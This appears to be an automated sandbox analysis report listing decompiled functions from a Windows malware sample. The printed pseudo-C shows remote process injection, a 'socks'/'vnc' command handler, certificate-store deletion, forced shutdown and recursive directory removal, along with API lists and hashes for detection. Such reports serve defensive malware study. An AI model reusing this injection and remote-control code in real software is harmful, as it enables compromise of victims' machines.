Instruction ID: 4417533b2c5fa329c76b8ba5198f5b016afe95bd44181aba4fcb8ba7f7169d7a
Opcode Fuzzy Hash: 7763b8973ad993beef1afbfcce2c01d04102c6571c4b6563e24f2d50315a1080
Instruction Fuzzy Hash: B8316E71201219EBDF119F65DE48BDA3BB9AF08348F008166FD48F2260D7B5D8A4DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004176C6, Relevance: 9.1, APIs: 6, Instructions: 53encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(0041BCFB,00000000,00000000,00000001,F0000040,?,0041BCFB,?,00000030,?,?,?,0041C214,00422FF0), ref: 004176DF
CryptCreateHash.ADVAPI32(0041BCFB,00008003,00000000,00000000,00000030,?,0041BCFB,?,00000030,?,?,?,0041C214,00422FF0), ref: 004176F7
CryptHashData.ADVAPI32(00000030,00000010,0041BCFB,00000000,?,0041BCFB), ref: 00417713
CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,0041BCFB), ref: 0041772B
CryptDestroyHash.ADVAPI32(00000030,?,0041BCFB), ref: 00417742
CryptReleaseContext.ADVAPI32(0041BCFB,00000000,?,0041BCFB,?,00000030,?,?,?,0041C214,00422FF0), ref: 0041774C

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
String ID:
API String ID: 3186506766-0
Opcode ID: 3835dfc47da88fbb4b0aff3b662bcb981bcd3fbea2fbc8bd214e1f0a9aaea509
Instruction ID: 720c994dbe868d7eeb92989b9b090fe14949cb5c876e18ace0844df376823ddf
Opcode Fuzzy Hash: 3835dfc47da88fbb4b0aff3b662bcb981bcd3fbea2fbc8bd214e1f0a9aaea509
Instruction Fuzzy Hash: 07115B7580424CBFEF019BA0DD88EEE7B7DFB04340F008461F591B11A1C7369E949B28

Uniqueness

Uniqueness Score: -1.00%

Function 00418469, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00418469() {
				char _v8;
				struct HINSTANCE__* _v12;
				void* _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t22;
				void* _t28;

				_t22 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
							_t22 = E0041687F( &_v1036 | 0xffffffff,  &_v1036);
						}
					}
					FreeLibrary(_v12);
				}
				return _t22;
			}

0x00418478
0x0041847a
0x00418480
0x00418485
0x0041848d
0x00418495
0x0041849b
0x004184a2
0x004184a8
0x004184a9
0x004184ac
0x004184b6
0x004184bb
0x004184bd
0x004184bd
0x004184c3
0x004184d9
0x004184d9
0x004184db
0x004184df
0x004184df
0x004184e9

APIs

LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0041847A
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0041848D
FreeLibrary.KERNEL32(?), ref: 004184DF

Strings

urlmon.dll, xrefs: 00418473
ObtainUserAgentString, xrefs: 00418487

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ObtainUserAgentString$urlmon.dll
API String ID: 145871493-2685262326
Opcode ID: 0421ded5ebcfb26099177bf3416cccccc5a4c13ee2ecbe719625786b9c04511a
Instruction ID: 2920c0828ba661fb5a546e69b0b787539e7b356e94aa338657367bac51488808
Opcode Fuzzy Hash: 0421ded5ebcfb26099177bf3416cccccc5a4c13ee2ecbe719625786b9c04511a
Instruction Fuzzy Hash: 7B016CB1940155BBCB10EBE89D849DE7BBCAB14350F2045BEB755F3290EE348F848B68

Uniqueness

Uniqueness Score: -1.00%

Function 0041D159, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041D159(void* __ecx, CHAR** _a4, signed int _a7) {
				signed int _v6;
				signed int _v8;
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				short _v30;
				intOrPtr _v36;
				char _v44;
				char _v304;
				char _v788;
				char _v792;
				void* __edi;
				void* __esi;
				int _t68;
				signed short _t70;
				signed int _t80;
				void* _t95;
				signed int _t99;
				void* _t102;
				signed int _t108;
				void* _t112;
				CHAR** _t121;
				signed int _t130;
				intOrPtr* _t131;
				intOrPtr* _t138;
				signed int _t139;
				void* _t141;

				_t123 = __ecx;
				E004164D4( &_v304,  &_v304, 0, 0x104);
				_t121 = _a4;
				if(lstrcmpiA( *_t121, "socks") != 0) {
					_t68 = lstrcmpiA( *_t121, "vnc");
					__eflags = _t68;
					if(_t68 != 0) {
						_t70 = E00416AA0( *_t121, _t123, 0);
						_t6 = _t70 - 1; // -1
						_t123 = _t6;
						__eflags = _t6 - 0xfffd;
						if(_t6 > 0xfffd) {
							L32:
							E0041A522( &_v304);
							_a7 = 0;
							if(_v304 <= 0) {
								L34:
								E00416421( *_t121);
								E00416421(_t121[1]);
								E00416421(_t121[2]);
								E00419BF4(_t121[3]);
								E00416421(_t121);
								return 0;
							} else {
								goto L33;
							}
							do {
								L33:
								CloseHandle( *(_t141 + (_a7 & 0x000000ff) * 4 - 0x128));
								_a7 = _a7 + 1;
							} while (_a7 < _v304);
							goto L34;
						}
						_t80 = _t70 & 0x0000ffff;
						_v24 = _t80;
						__eflags = _t80;
						if(_t80 == 0) {
							goto L32;
						}
						L6:
						_t130 = E004194AA(E00416AA0(_t121[2], _t123, 0), _t123, _t121[1]);
						_v16 = _t130;
						if(_t130 == 0xffffffff) {
							goto L32;
						}
						E0041981C(_t123, _t130);
						E004197DA(_t130);
						_t89 = E00417278(E00406A66(_t123,  &_v792) | 0xffffffff,  &_v788,  &_v44);
						_t144 = _t89;
						if(_t89 == 0) {
							L31:
							E004197C4(_t89, _t130);
							goto L32;
						}
						_v9 = E0041CAC7( &_v788, _v36, _t144, _t130, 1, _v44);
						_t89 = E00417266( &_v44);
						if(_v9 == 0) {
							goto L31;
						}
						_t89 = E004196D1(0,  &_v16, 0, 0);
						_t130 = _v16;
						if(_t89 != _t130) {
							goto L31;
						}
						while(1) {
							_push(0x7530);
							_push( &_v8);
							_t95 = 4;
							if(E004193D4(_t95, _t130) == 0 || _v8 <= 4) {
								break;
							}
							_t138 = E004163F1(_v8 & 0x0000ffff);
							_push(0x7530);
							if(_t138 == 0) {
								_t127 = _v8 & 0x0000ffff;
								_t99 = (_v6 & 0x0000ffff) + (_v8 & 0x0000ffff) - 4;
								L29:
								_push(_t99);
								_push(_t130);
								_t89 = E0041941C(_t127);
								break;
							}
							_push(_t138);
							_t127 = _t130;
							_t102 = E004193D4((_v8 & 0x0000ffff) - 4, _t130);
							_push(_t138);
							if(_t102 == 0) {
								L35:
								_t89 = E00416421();
								break;
							}
							_v30 = _v6;
							_v28 =  *_t138;
							E00416421();
							if(_v6 != 0) {
								_t139 = E004163F1(_v6 & 0x0000ffff);
								_t99 = _v6 & 0x0000ffff;
								_push(0x7530);
								__eflags = _t139;
								if(_t139 == 0) {
									goto L29;
								}
								_push(_t139);
								_t127 = _t130;
								_t108 = E004193D4(_t99, _t130);
								__eflags = _t108;
								if(_t108 == 0) {
									_push(_t139);
									goto L35;
								}
								_v20 = _t139;
								L20:
								if(_v28 == 2 && _v30 == 4) {
									_t112 = 0xc;
									_t131 = E004163F1(_t112);
									if(_t131 != 0) {
										 *_t131 = _a4;
										 *((intOrPtr*)(_t131 + 4)) = _v24;
										 *((intOrPtr*)(_t131 + 8)) =  *_v20;
										if(E0041A4DD( &_v304, 0x20000, E0041CED0, _t131) == 0) {
											E00416421(_t131);
										}
									}
									E0041A48B(_t127,  &_v304);
								}
								E00416421(_v20);
								_t89 = E004196D1(0,  &_v16, 0, 0);
								_t130 = _v16;
								if(_t89 == _t130) {
									continue;
								} else {
									break;
								}
							}
							_v20 = _v20 & 0x00000000;
							goto L20;
						}
						_t121 = _a4;
						goto L31;
					}
					_v24 = 0xfffffffe;
					goto L6;
				}
				_v24 = _v24 | 0xffffffff;
				goto L6;
			}

0x0041d159
0x0041d173
0x0041d178
0x0041d18c
0x0041d19b
0x0041d19d
0x0041d19f
0x0041d1ae
0x0041d1b3
0x0041d1b3
0x0041d1b6
0x0041d1bc
0x0041d395
0x0041d39b
0x0041d3a7
0x0041d3ab
0x0041d3cc
0x0041d3ce
0x0041d3d6
0x0041d3de
0x0041d3e6
0x0041d3ec
0x0041d3f7
0x00000000
0x00000000
0x00000000
0x0041d3ad
0x0041d3ad
0x0041d3b8
0x0041d3be
0x0041d3c4
0x00000000
0x0041d3ad
0x0041d1c2
0x0041d1c5
0x0041d1c8
0x0041d1ca
0x00000000
0x00000000
0x0041d1d0
0x0041d1e2
0x0041d1e4
0x0041d1ea
0x00000000
0x00000000
0x0041d1f1
0x0041d1f7
0x0041d214
0x0041d219
0x0041d21b
0x0041d38e
0x0041d390
0x00000000
0x0041d390
0x0041d232
0x0041d235
0x0041d23e
0x00000000
0x00000000
0x0041d24e
0x0041d253
0x0041d258
0x00000000
0x00000000
0x0041d263
0x0041d263
0x0041d267
0x0041d26a
0x0041d274
0x00000000
0x00000000
0x0041d28e
0x0041d290
0x0041d293
0x0041d37c
0x0041d380
0x0041d384
0x0041d384
0x0041d385
0x0041d386
0x00000000
0x0041d386
0x0041d2a0
0x0041d2a1
0x0041d2a3
0x0041d2a8
0x0041d2ab
0x0041d3fa
0x0041d3fa
0x00000000
0x0041d3fa
0x0041d2b5
0x0041d2bb
0x0041d2be
0x0041d2c8
0x0041d2d9
0x0041d2db
0x0041d2df
0x0041d2e0
0x0041d2e2
0x00000000
0x00000000
0x0041d2e8
0x0041d2e9
0x0041d2eb
0x0041d2f0
0x0041d2f2
0x0041d401
0x00000000
0x0041d401
0x0041d2f8
0x0041d2fb
0x0041d2ff
0x0041d30a
0x0041d310
0x0041d314
0x0041d319
0x0041d31e
0x0041d337
0x0041d341
0x0041d344
0x0041d344
0x0041d341
0x0041d34f
0x0041d34f
0x0041d357
0x0041d366
0x0041d36b
0x0041d370
0x00000000
0x0041d376
0x00000000
0x0041d376
0x0041d370
0x0041d2ca
0x00000000
0x0041d2ca
0x0041d38b
0x00000000
0x0041d38b
0x0041d1a1
0x00000000
0x0041d1a1
0x0041d18e
0x00000000

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 0041D188
lstrcmpiA.KERNEL32(?,vnc), ref: 0041D19B
CloseHandle.KERNEL32(?), ref: 0041D3B8

Part of subcall function 0041A4DD: SetLastError.KERNEL32(0000009B,00406D57,00000000,004159EE,00000000,00422838,00000000,00000104,74B5F560,00000000), ref: 0041A4E7

Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434

Strings

socks, xrefs: 0041D181
vnc, xrefs: 0041D194

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmpi$CloseErrorFreeHandleHeapLast
String ID: socks$vnc
API String ID: 3305036421-270151703
Opcode ID: 407894ccbe9b462facb202eae69172e4b685f1a2b744b3889e0fea3985d24f34
Instruction ID: 202464533ce8aa41e9cb099a8f84b9da7cb3457ded70aa4ab9a89305bb03fbec
Opcode Fuzzy Hash: 407894ccbe9b462facb202eae69172e4b685f1a2b744b3889e0fea3985d24f34
Instruction Fuzzy Hash: 5271C671D00218AACF11ABA5C841BFE7BB5AF05314F1441ABF960BB281C77C9EC1C76A

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA9D, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA9D(WCHAR* __ecx, void* __eflags) {
				struct _WIN32_FIND_DATAW _v596;
				short _v1116;
				WCHAR* _t38;
				void* _t42;

				_t38 = __ecx;
				if(E0041BCB4("*",  &_v1116, __ecx) == 0) {
					L9:
					SetFileAttributesW(_t38, 0x80);
					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
				}
				_t42 = FindFirstFileW( &_v1116,  &_v596);
				if(_t42 == 0xffffffff) {
					goto L9;
				} else {
					goto L2;
				}
				do {
					L2:
					if(E0041B8B4( &(_v596.cFileName)) == 0 && E0041BCB4( &(_v596.cFileName),  &_v1116, _t38) != 0) {
						_t51 = _v596.dwFileAttributes & 0x00000010;
						if((_v596.dwFileAttributes & 0x00000010) == 0) {
							E0041B785( &_v1116);
						} else {
							E0041BA9D( &_v1116, _t51);
						}
					}
				} while (FindNextFileW(_t42,  &_v596) != 0);
				FindClose(_t42);
				goto L9;
			}

0x0041baab
0x0041babf
0x0041bb3a
0x0041bb40
0x0041bb57
0x0041bb57
0x0041bad4
0x0041bad9
0x00000000
0x00000000
0x00000000
0x00000000
0x0041badb
0x0041badb
0x0041bae9
0x0041bb01
0x0041bb09
0x0041bb1b
0x0041bb0b
0x0041bb0f
0x0041bb0f
0x0041bb09
0x0041bb2f
0x0041bb34
0x00000000

APIs

Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3

FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BACE
FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 0041BB29
FindClose.KERNEL32(00000000,?,00000000), ref: 0041BB34
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000), ref: 0041BB40
RemoveDirectoryW.KERNEL32(?,?,00000000), ref: 0041BB47

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
String ID:
API String ID: 765042924-0
Opcode ID: 237f922c78a70e55cc56f3a79aaa4565ac92c51d51cacf4ce3064d4657b29dc6
Instruction ID: f42f0f00838b5481297b6434c1cc9889b46f0ccdb6ed3802403677fab7e107eb
Opcode Fuzzy Hash: 237f922c78a70e55cc56f3a79aaa4565ac92c51d51cacf4ce3064d4657b29dc6
Instruction Fuzzy Hash: E911C4320082085AC320E764DD49EEFB3ACEF49354F04466FB994D25A5EB78A58587DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C227, Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,004033D0), ref: 0040C232
CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0040C24B
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,00406EB9), ref: 0040C256
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040C25E
CertCloseStore.CRYPT32(00000000,00000000), ref: 0040C26A

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
String ID:
API String ID: 1842529175-0
Opcode ID: 60584b6451722c28f6597c7f759968a0905a1bfa41d00a44ac9d314a7c76855c
Instruction ID: 550d0322c588a67aa8199e68f71acf66f16c382dfcc46fff7d739ed52b1edf93
Opcode Fuzzy Hash: 60584b6451722c28f6597c7f759968a0905a1bfa41d00a44ac9d314a7c76855c
Instruction Fuzzy Hash: 94F0EC31681210E7D61117756E58FE77B5C9F82B51F100177FA85F3AA08E34984185BC

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA8F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040BA8F() {
				signed int _v124;
				signed char _t12;
				unsigned int _t15;
				void* _t23;
				void* _t24;

				_t12 =  *0x422834; // 0x0
				if((_t12 & 0x00000010) == 0) {
					__eflags = _t12 & 0x00000008;
					if(__eflags != 0) {
						E0040F10A(_t23, _t24, __eflags);
						_t12 =  *0x422834; // 0x0
					}
					__eflags = _t12 & 0x00000003;
					if((_t12 & 0x00000003) == 0) {
						__eflags = _t12 & 0x00000004;
						if((_t12 & 0x00000004) != 0) {
							goto L8;
						}
						goto L9;
					} else {
						E00417AED(L"SeShutdownPrivilege");
						_t15 =  *0x422834; // 0x0
						__eflags = 0;
						__imp__InitiateSystemShutdownExW(0, 0, 0, 1, _t15 >> 0x00000001 & 0x00000001, 0x80000000);
						return 0;
					}
				} else {
					_t12 = E0041CDE1( &_v124);
					if(_t12 != 0) {
						_v124 = _v124 | 0x00000020;
						 *0x422940 =  *0x422940 | 0x00000010;
						E0041CE39( &_v124);
						L8:
						return ExitWindowsEx(0x14, 0x80000000);
					}
					L9:
					return _t12;
				}
			}

0x0040ba92
0x0040ba9c
0x0040bac1
0x0040bac3
0x0040bac5
0x0040baca
0x0040baca
0x0040bacf
0x0040bad1
0x0040bafc
0x0040bafe
0x00000000
0x00000000
0x00000000
0x0040bad3
0x0040bad8
0x0040badd
0x0040baef
0x0040baf4
0x0040bafb
0x0040bafb
0x0040ba9e
0x0040baa2
0x0040baa9
0x0040baab
0x0040baaf
0x0040baba
0x0040bb00
0x00000000
0x0040bb07
0x0040bb0e
0x0040bb0e
0x0040bb0e

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0040BAF4

Part of subcall function 0041CDE1: CreateMutexW.KERNEL32(00422978,00000000,00423FC8,?,?,00410FC6,?,?,?,743C152E,00000002), ref: 0041CE07

ExitWindowsEx.USER32(00000014,80000000), ref: 0040BB07

Strings

SeShutdownPrivilege, xrefs: 0040BAD3
, xrefs: 0040BAAB

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateExitInitiateMutexShutdownSystemWindows
String ID: $SeShutdownPrivilege
API String ID: 3829579691-2253681161
Opcode ID: abffc308fa9d67fef31268affff93e99ffdabdc05f230a320eaeef5806036dd1
Instruction ID: 0dc91cd7f9ee4c1499ee609b40f294ee418b55e21709c3d04dfc56f4513e1a5f
Opcode Fuzzy Hash: abffc308fa9d67fef31268affff93e99ffdabdc05f230a320eaeef5806036dd1
Instruction Fuzzy Hash: 70F086313107086AEA24A7B45E56BEA7B6CDB00348F54013AED41B62E2C7B9A442CA6C

Uniqueness

Uniqueness Score: -1.00%

Function 0041AD83, Relevance: 6.1, APIs: 4, Instructions: 94
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041AD83(void* __eax, void* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				void* _t37;
				void* _t42;
				intOrPtr* _t43;
				int _t44;
				long _t46;
				void* _t47;
				SIZE_T* _t48;
				signed int _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				unsigned int _t64;

				_t55 = __eax;
				_t1 = _t55 + 0x3c; // 0xd8
				_t60 =  *_t1 + __eax;
				_t46 =  *(_t60 + 0x50);
				_v24 = _t46;
				_v5 = 0;
				if(IsBadReadPtr(__eax, _t46) == 0) {
					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
					_v12 = _t37;
					__eflags = _t37;
					if(__eflags == 0) {
						L17:
						return _v12;
					}
					_t47 = E00416474(__eflags, _t55, _t46);
					_t48 = 0;
					__eflags = _t47;
					if(_t47 == 0) {
						L16:
						VirtualFreeEx(_a4, _v12, 0, 0x8000);
						_t32 =  &_v12;
						 *_t32 = _v12 & 0x00000000;
						__eflags =  *_t32;
						goto L17;
					}
					__eflags =  *(_t60 + 0xa4);
					if( *(_t60 + 0xa4) <= 0) {
						L15:
						E00416421(_t47);
						__eflags = _v5;
						if(_v5 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t42 =  *(_t60 + 0xa0);
					__eflags = _t42;
					if(_t42 <= 0) {
						goto L15;
					}
					_t61 =  *((intOrPtr*)(_t60 + 0x34));
					_t54 = _v12 - _t61;
					_v20 = _t55 - _t61;
					_t43 = _t42 + _t47;
					while(1) {
						__eflags =  *_t43 - _t48;
						if( *_t43 == _t48) {
							break;
						}
						_t62 =  *((intOrPtr*)(_t43 + 4));
						__eflags = _t62 - 8;
						if(_t62 < 8) {
							L12:
							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
							_t48 = 0;
							__eflags = 0;
							continue;
						}
						_t64 = _t62 + 0xfffffff8 >> 1;
						__eflags = _t64;
						_v16 = _t48;
						if(_t64 == 0) {
							goto L12;
						} else {
							goto L9;
						}
						do {
							L9:
							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
							__eflags = _t50;
							if(_t50 != 0) {
								_t52 = (_t50 & 0x00000fff) +  *_t43;
								_t19 = _t52 + _t47;
								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
								__eflags =  *_t19;
							}
							_v16 = _v16 + 1;
							__eflags = _v16 - _t64;
						} while (_v16 < _t64);
						goto L12;
					}
					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
					__eflags = _t44;
					_t28 =  &_v5;
					 *_t28 = _t44 != 0;
					__eflags =  *_t28;
					goto L15;
				}
				return 0;
			}

0x0041ad8c
0x0041ad8e
0x0041ad91
0x0041ad93
0x0041ad98
0x0041ad9b
0x0041ada7
0x0041adbd
0x0041adc3
0x0041adc6
0x0041adc8
0x0041ae7e
0x00000000
0x0041ae7e
0x0041add5
0x0041add7
0x0041add9
0x0041addb
0x0041ae67
0x0041ae74
0x0041ae7a
0x0041ae7a
0x0041ae7a
0x00000000
0x0041ae7a
0x0041ade1
0x0041ade7
0x0041ae5b
0x0041ae5c
0x0041ae61
0x0041ae65
0x00000000
0x00000000
0x00000000
0x0041ae65
0x0041ade9
0x0041adef
0x0041adf1
0x00000000
0x00000000
0x0041adf3
0x0041adfb
0x0041adfd
0x0041ae00
0x0041ae40
0x0041ae40
0x0041ae42
0x00000000
0x00000000
0x0041ae04
0x0041ae07
0x0041ae0a
0x0041ae3b
0x0041ae3b
0x0041ae3e
0x0041ae3e
0x00000000
0x0041ae3e
0x0041ae0f
0x0041ae0f
0x0041ae11
0x0041ae14
0x00000000
0x00000000
0x00000000
0x00000000
0x0041ae16
0x0041ae16
0x0041ae19
0x0041ae1e
0x0041ae21
0x0041ae29
0x0041ae30
0x0041ae30
0x0041ae30
0x0041ae30
0x0041ae33
0x0041ae36
0x0041ae36
0x00000000
0x0041ae16
0x0041ae4f
0x0041ae55
0x0041ae57
0x0041ae57
0x0041ae57
0x00000000
0x0041ae57
0x00000000

APIs

IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000), ref: 0041AD9F
VirtualAllocEx.KERNEL32(74B5F560,00000000,?,00003000,00000040), ref: 0041ADBD
WriteProcessMemory.KERNEL32(74B5F560,74B5F560,00000000,00000000,00000000,00400000,?), ref: 0041AE4F
VirtualFreeEx.KERNEL32(74B5F560,74B5F560,00000000,00008000,00400000,?), ref: 0041AE74

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreeMemoryProcessReadWrite
String ID:
API String ID: 1273498236-0
Opcode ID: 1c5631be1c6a025212545cc3ad29e2a3260dda70f4c438d802a992a1acec94b2
Instruction ID: 2016ab03fd188a559c24ceaa5fa9f490ad7a8f789a602e142d39eede084ac579
Opcode Fuzzy Hash: 1c5631be1c6a025212545cc3ad29e2a3260dda70f4c438d802a992a1acec94b2
Instruction Fuzzy Hash: CF31B072A41309AFCF108BA4CD84BEEBBB5EF45701F05406AE506B72A0D7749DA1CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C8C2, Relevance: 6.1, APIs: 4, Instructions: 86commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?,?,?,?,?,?,?,?,?,00412E7F,?,?), ref: 0041C8E8
VariantInit.OLEAUT32(?), ref: 0041C934
SysAllocString.OLEAUT32(?), ref: 0041C944
VariantClear.OLEAUT32(?), ref: 0041C97D

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$AllocClearCreateInitInstanceString
String ID:
API String ID: 3126708813-0
Opcode ID: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
Instruction ID: 9fc86f269e3b91c3a51af9d4d42ee7ef0eb327d348b868b3c45e5bdb8cb59ef2
Opcode Fuzzy Hash: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
Instruction Fuzzy Hash: 25215171940228AFCB109BA5CCC8EEF7BB8EF09750F0405B6F906EB251D67599408BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00417A96, Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417A96(intOrPtr _a4) {
				intOrPtr _v20;
				void* _v32;
				signed int _t6;
				signed int _t7;
				int _t9;
				int _t14;
				void* _t15;

				_t14 = 0;
				_t6 = CreateToolhelp32Snapshot(4, 0);
				_t15 = _t6;
				_t7 = _t6 | 0xffffffff;
				if(_t15 != _t7) {
					_v32 = 0x1c;
					_t9 = Thread32First(_t15,  &_v32);
					while(_t9 != 0) {
						if(_v20 == _a4) {
							_t14 = _t14 + 1;
						}
						_t9 = Thread32Next(_t15,  &_v32);
					}
					CloseHandle(_t15);
					return _t14;
				}
				return _t7;
			}

0x00417a9e
0x00417aa3
0x00417aa9
0x00417aab
0x00417ab0
0x00417ab7
0x00417abe
0x00417ada
0x00417acc
0x00417ace
0x00417ace
0x00417ad4
0x00417ad4
0x00417adf
0x00000000
0x00417ae5
0x00417aea

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00417AA3
Thread32First.KERNEL32 ref: 00417ABE
Thread32Next.KERNEL32 ref: 00417AD4
CloseHandle.KERNEL32(00000000), ref: 00417ADF

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 3643885135-0
Opcode ID: 584730450807f66d330768fb13783ff37ab6e15cf2158fba25e729a16c2ae00b
Instruction ID: b0b5a733d709de2560576e3368e4358bbbe5beed0d8220b7ac00c3da05f8b9c9
Opcode Fuzzy Hash: 584730450807f66d330768fb13783ff37ab6e15cf2158fba25e729a16c2ae00b
Instruction Fuzzy Hash: E0F08976504115BBDB20AB65DC08DEF7FBCEF85390B004122FA11E6190D734DE41C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 00419563, Relevance: 6.0, APIs: 4, Instructions: 32networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 0041956C
bind.WS2_32(00000000,?,-0000001D), ref: 0041958C
listen.WS2_32(00000000,?), ref: 0041959B
closesocket.WS2_32(00000000), ref: 004195A6

